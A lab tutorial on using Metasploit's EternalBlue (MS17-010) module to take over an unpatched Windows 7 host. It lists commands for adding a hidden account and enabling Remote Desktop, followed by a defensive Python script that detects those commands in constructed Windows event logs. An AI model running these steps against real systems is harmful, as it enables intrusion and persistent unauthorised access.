First use of the Metasploit exploit framework: gaining access to a Windows 7 host
Target system: Windows 7, unpatched
Target IP address: 192.168.20.131
Task: use MS17-010 (the EternalBlue vulnerability) to gain control of the target system
1. Before using Metasploit, the PostgreSQL database must be running; enter service postgresql start to start the service.
2. Enter msfconsole to start Metasploit; once the msf5 prompt appears, startup is complete.
3. First find the modules to use: enter search ms17-010 and pick out the scanner module from the results.
As can be seen:
auxiliary/scanner/smb/smb_ms17_010 is a scanner module that checks whether the target has the MS17-010 vulnerability;
exploit/windows/smb/ms17_010_eternalblue is the exploit module.
4. With the module paths known, start by entering use auxiliary/scanner/smb/smb_ms17_010 to load the scanner.
5. Inside the scanner module, show options lists the parameters that need to be set.
6. Set the parameter: enter set rhosts 192.168.20.131 so that the host to be checked is the target.
7. Enter exploit to check whether the target host is vulnerable.
8. Since the scan reports the host as vulnerable, go straight for it: enter use exploit/windows/smb/ms17_010_eternalblue to load the MS17-010 exploit module, then set rhosts 192.168.20.131 to point it at the target host.
9. Run exploit to launch the attack; it succeeds and drops straight into a shell with SYSTEM privileges.
10. With the shell obtained, anything goes, of course:
net user $username /add, adds a hidden user
net user $username $password, sets the hidden user's password
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f, opens port 3389 (Remote Desktop)
11. Summary
metasploit-framework is a truly indispensable tool for network penetration testing: it provides a large number of ready-made, easy-to-use exploit modules that save testers a great deal of time. It is excellent, and penetration testers should make sure they are proficient with it.
Done
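From the defender's side, the post-exploitation commands in step 10 (a local account added with net user, and fDenyTSConnections flipped to 0 with REG ADD) leave distinctive traces in the Windows Security log. The following Python script is an added example, not part of the original post, that runs a few simple detection rules over constructed event records modelled on Event ID 4688 (process creation with command line), 4720 (user account created) and 4657 (registry value modified). The event records, the account and user names, and the reduced field set are all constructed for illustration; a real deployment would feed it events parsed from EVTX files or a log forwarder.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample Windows Security events (not real log data), flattened to
# the few fields the rules below need. Field names follow the Windows Security
# event XML schema (EventID, SubjectUserName, CommandLine, TargetUserName, ...).
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"EventID": "4688", "SubjectUserName": "SYSTEM",
     "NewProcessName": r"C:\Windows\System32\net.exe",
     "CommandLine": "net user backup$ P@ssw0rd /add"},
    {"EventID": "4720", "SubjectUserName": "SYSTEM", "TargetUserName": "backup$"},
    {"EventID": "4688", "SubjectUserName": "SYSTEM",
     "NewProcessName": r"C:\Windows\System32\reg.exe",
     "CommandLine": r'REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" '
                    r"/v fDenyTSConnections /t REG_DWORD /d 00000000 /f"},
    {"EventID": "4657", "SubjectUserName": "SYSTEM",
     "ObjectName": r"\REGISTRY\MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server",
     "ObjectValueName": "fDenyTSConnections", "NewValue": "0"},
    # Benign noise from an interactive administrator session.
    {"EventID": "4688", "SubjectUserName": "alice",
     "NewProcessName": r"C:\Windows\System32\ipconfig.exe",
     "CommandLine": "ipconfig /all"},
]

# net.exe / net1.exe creating a local account; group 1 captures the account name.
NET_USER_ADD = re.compile(r"\bnet1?(?:\.exe)?\s+user\s+(\S+)\s+.*?/add\b", re.IGNORECASE)
# reg.exe writing a zero into fDenyTSConnections under the Terminal Server key.
REG_ENABLE_RDP = re.compile(
    r"\breg(?:\.exe)?\s+add\b.*terminal server.*fDenyTSConnections.*?/d\s+0+\b",
    re.IGNORECASE,
)

Finding = Tuple[str, str]  # (rule name, human-readable detail)


def check_event(ev: Dict[str, str]) -> List[Finding]:
    """Apply the post-exploitation rules to one event and return any findings."""
    findings: List[Finding] = []
    eid = ev.get("EventID")
    subject = ev.get("SubjectUserName", "")

    if eid == "4688":
        cmd = ev.get("CommandLine", "")
        m = NET_USER_ADD.search(cmd)
        if m:
            user = m.group(1)
            findings.append(("local_account_added_via_net", f"{subject} ran: {cmd}"))
            if user.endswith("$"):
                # Names ending in '$' are omitted from a plain `net user` listing,
                # so one created on a workstation deserves a closer look.
                findings.append(("hidden_style_account_name", f"account name {user!r}"))
        if REG_ENABLE_RDP.search(cmd):
            findings.append(("rdp_enabled_via_reg_add", f"{subject} ran: {cmd}"))

    elif eid == "4720":
        target = ev.get("TargetUserName", "")
        if subject.upper() == "SYSTEM":
            # Interactive admins create accounts as themselves; a SYSTEM-level
            # shell obtained through an SMB kernel exploit does it as SYSTEM.
            findings.append(("account_created_by_system", f"created {target!r}"))
        if target.endswith("$"):
            findings.append(("hidden_style_account_name", f"account name {target!r}"))

    elif eid == "4657":
        value = ev.get("NewValue", "")
        if (ev.get("ObjectValueName", "").lower() == "fdenytsconnections"
                and value and value.strip("0") == ""):
            findings.append(("rdp_enabled_registry_value",
                             f"{ev.get('ObjectName')} set to 0 by {subject}"))

    return findings


def scan_events(events: List[Dict[str, str]]) -> List[Finding]:
    """Run every rule over every event; findings come back in event order."""
    out: List[Finding] = []
    for ev in events:
        out.extend(check_event(ev))
    return out


if __name__ == "__main__":
    for rule, detail in scan_events(SAMPLE_EVENTS):
        print(f"[{rule}] {detail}")
```

Two prerequisites for the rules to fire on a real host: command-line capture in 4688 events (Process Creation auditing with "Include command line in process creation events") and a SACL on the Terminal Server key so that 4657 is written. On a domain controller, names ending in "$" are ordinary computer accounts, so that heuristic belongs on workstations and member servers only.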